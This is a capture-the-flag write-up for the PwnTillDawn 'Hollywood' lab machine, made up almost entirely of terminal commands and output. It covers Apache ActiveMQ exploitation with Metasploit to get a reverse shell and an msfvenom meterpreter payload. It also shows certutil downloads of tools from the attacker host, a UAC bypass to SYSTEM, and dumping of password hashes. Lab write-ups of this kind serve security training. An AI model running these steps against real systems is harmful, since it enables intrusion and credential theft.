As always we start with a nmap scan
─[user@parrot-virtual]─[~/ptd] └──╼ $nmap -Pn -p1-65535 10.150.150.219 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 08:55 BST Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 80.05% done; ETC: 08:56 (0:00:07 remaining) Nmap scan report for 10.150.150.219 Host is up (0.032s latency). Not shown: 65502 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 79/tcp open finger 80/tcp open http 105/tcp open csnet-ns 106/tcp open pop3pw 110/tcp open pop3 135/tcp open msrpc 139/tcp open netbios-ssn 143/tcp open imap 443/tcp open https 445/tcp open microsoft-ds 554/tcp open rtsp 1883/tcp open mqtt 2224/tcp open efi-mg 2869/tcp open icslap 3306/tcp open mysql 5672/tcp open amqp 8009/tcp open ajp13 8080/tcp open http-proxy 8089/tcp open unknown 8161/tcp open patrol-snmp 10243/tcp open unknown 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown 49251/tcp open unknown 61613/tcp open unknown 61614/tcp open unknown 61616/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds ┌─[user@parrot-virtual]─[~/ptd] └──╼ $
Next we browse to Welcome to the Apache ActiveMQ! http://10.150.150.219:8161/ it has an msf exploit https://www.exploit-db.com/exploits/42283
.
.
msf6 exploit(windows/http/apache_activemq_traversal_upload) > show options Module options (exploit/windows/http/apache_activemq_traversal_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD admin yes Password to authenticate with PATH /fileserver/..\admin\ yes Traversal path Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.150.150.219 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 8161 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the web application USERNAME admin yes Username to authenticate with VHOST no HTTP server virtual host Payload options (java/jsp_shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.66.66.210 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port SHELL no The system shell to use. Exploit target: Id Name -- ---- 0 Windows Java msf6 exploit(windows/http/apache_activemq_traversal_upload) > run [*] Started reverse TCP handler on 10.66.66.210:4444 [*] Uploading payload... [*] Payload sent. Attempting to execute the payload. [+] Payload executed! [*] Command shell session 1 opened (10.66.66.210:4444 -> 10.150.150.219:49284) at 2020-08-26 09:18:27 +0100 C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>whoami whoami hollywood\user C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>
next we create a meterpreter executable
─[user@parrot-virtual]─[~/Downloads] $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe
.
─[✗]─[user@parrot-virtual]─[~/Downloads] └──╼ $sudo python3 -m http.server 80 [sudo] password for user: Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 - 10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
c:\puck>certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe **** Online **** 000000 ... 01204a CertUtil: -URLCache command completed successfully. c:\puck>dir dir Volume in drive C has no label. Volume Serial Number is 021A-9C32 Directory of c:\puck 08/26/2020 05:21 PM <DIR> . 08/26/2020 05:21 PM <DIR> .. 08/26/2020 05:21 PM 73,802 7777.exe 1 File(s) 73,802 bytes 2 Dir(s) 44,543,938,560 bytes free c:\puck>
start the listener , and then execute c:\puck>7777.exe
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost tun0 lhost => 10.66.66.210 msf6 exploit(multi/handler) > set lport 7777 lport => 7777 msf6 exploit(multi/handler) > run -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.66.66.210:7777 msf6 exploit(multi/handler) >
.
msf6 exploit(multi/handler) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219) msf6 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... c:\puck>7777.exe 7777.exe c:\puck> [*] Sending stage (175174 bytes) to 10.150.150.219 [*] Meterpreter session 2 opened (10.66.66.210:7777 -> 10.150.150.219:49293) at 2020-08-26 09:32:53 +0100 c:\puck>
c:\puck>^Z Background session 1? [y/N] y msf6 exploit(multi/handler) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219) 2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219) msf6 exploit(multi/handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > hashdump [-] 2007: Operation failed: The parameter is incorrect. meterpreter > meterpreter > shell Process 5088 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\puck>whoami whoami hollywood\user c:\puck>
c:\puck>^Z Background channel 1? [y/N] y meterpreter > Background session 2? [y/N] msf6 exploit(multi/handler) > search suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester msf6 exploit(multi/handler) > use 0 msf6 post(multi/recon/local_exploit_suggester) > set session 2 session => 2 msf6 post(multi/recon/local_exploit_suggester) > run [*] 10.150.150.219 - Collecting local exploits for x86/windows... [*] 10.150.150.219 - 34 exploit checks are being tried... [+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. nil versions are discouraged and will be deprecated in Rubygems 4 [+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable. [+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [*] Post module execution completed msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0 lhost => tun0 msf6 exploit(windows/local/bypassuac_eventvwr) > set session 2 session => 2 msf6 exploit(windows/local/bypassuac_eventvwr) > run [-] Handler failed to bind to 10.66.66.210:4444:- - [-] Handler failed to bind to 0.0.0.0:4444:- - [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Configuring payload and stager registry keys ... [*] Executing payload: C:\Windows\System32\eventvwr.exe [+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute. [*] Sending stage (175174 bytes) to 10.150.150.219 [*] Meterpreter session 3 opened (10.66.66.210:4444 -> 10.150.150.219:49300) at 2020-08-26 09:44:50 +0100 [*] Cleaning up registry keys ... [*] Exploit completed, but no session was created. msf6 exploit(windows/local/bypassuac_eventvwr) > msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219) 2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219) 3 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:4444 -> 10.150.150.219:49300 (10.150.150.219) msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 3 [*] Starting interaction with 3... meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x86 0 244 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 328 312 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 364 3876 xampp-control.exe x86 1 HOLLYWOOD\User C:\xampp\xampp-control.exe 400 3876 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe 408 312 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe 416 400 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 464 400 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe 512 408 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe 520 408 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe 528 408 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe 624 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 684 512 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 728 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 816 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 864 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 892 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe 916 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 1028 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 1200 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 1224 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 1384 512 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1412 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 1504 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1612 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe 1664 512 splunkd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 1700 512 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe 1728 328 conhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe 1760 512 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe 1816 512 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 1832 624 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe 1880 364 mysqld.exe x86 1 HOLLYWOOD\User c:\xampp\mysql\bin\mysqld.exe 2240 512 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe 2520 1664 splunk-winevtlog.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 2640 364 FileZillaServer.exe x86 1 HOLLYWOOD\User c:\xampp\filezillaftp\filezillaserver.exe 2676 364 mercury.exe x86 1 HOLLYWOOD\User c:\xampp\MercuryMail\mercury.exe 2748 400 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Oracle\Java\javapath\java.exe 2824 3876 jusched.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Java\Java Update\jusched.exe 2908 3916 httpd.exe x86 1 HOLLYWOOD\User C:\xampp\apache\bin\httpd.exe 2992 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe 3008 2748 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe 3124 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe 3156 3876 vmtoolsd.exe x86 1 HOLLYWOOD\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 3472 364 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\System32\cmd.exe 3548 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe 3640 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe 3776 3472 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Java\jre1.8.0_231\bin\java.exe 3820 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 3840 864 dwm.exe x86 1 HOLLYWOOD\User C:\Windows\system32\Dwm.exe 3856 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe 3876 3608 explorer.exe x86 1 HOLLYWOOD\User C:\Windows\Explorer.EXE 3916 364 httpd.exe x86 1 HOLLYWOOD\User c:\xampp\apache\bin\httpd.exe 3968 512 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe 4080 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 4632 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe 4824 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe 4912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe 5004 3008 7777.exe x86 1 HOLLYWOOD\User c:\puck\7777.exe 5088 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe 5356 4372 powershell.exe x86 1 HOLLYWOOD\User C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe 5904 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe meterpreter > migrate 3820 [*] Migrating from 5356 to 3820... [*] Migration completed successfully. meterpreter > shell Process 5184 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>
certutil -urlcache -split -f http://10.66.66.210/fgdump.exe c:\puck\fgdump.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat
certutil -urlcache -split -f http://10.66.66.210/Chimichurri.exe c:\puck\Chimichurri.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
└──╼ $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe
multi/handler
run -j
powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\pwdump7.exe -Uri http://10.66.66.210/pwdump7.exe
certutil -urlcache -split -f http://10.66.66.210/pwdump8.exe c:\puck\pwdump8.exe
c:\puck>pwdump8.exe
pwdump8.exe
PwDump v8.2 – dumps windows password hashes – by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
User:1000:AAD3B435B51404EEAAD3B435B51404EE:F9E1A02072D330DDF77AD82CB54D5EC4
HomeGroupUser$:1002:AAD3B435B51404EEAAD3B435B51404EE:283C3C4DC5544A73569F35F22A5B1DCA
c:\puck>
C:\Windows\system32>powershell -c Get-PSDrive
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat
REG QUERY HKLM /v “EditionID” /s
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
Incredibly well written, amazing to follow.
Would you know why msf is coming back with failed upload for example? happened countless times.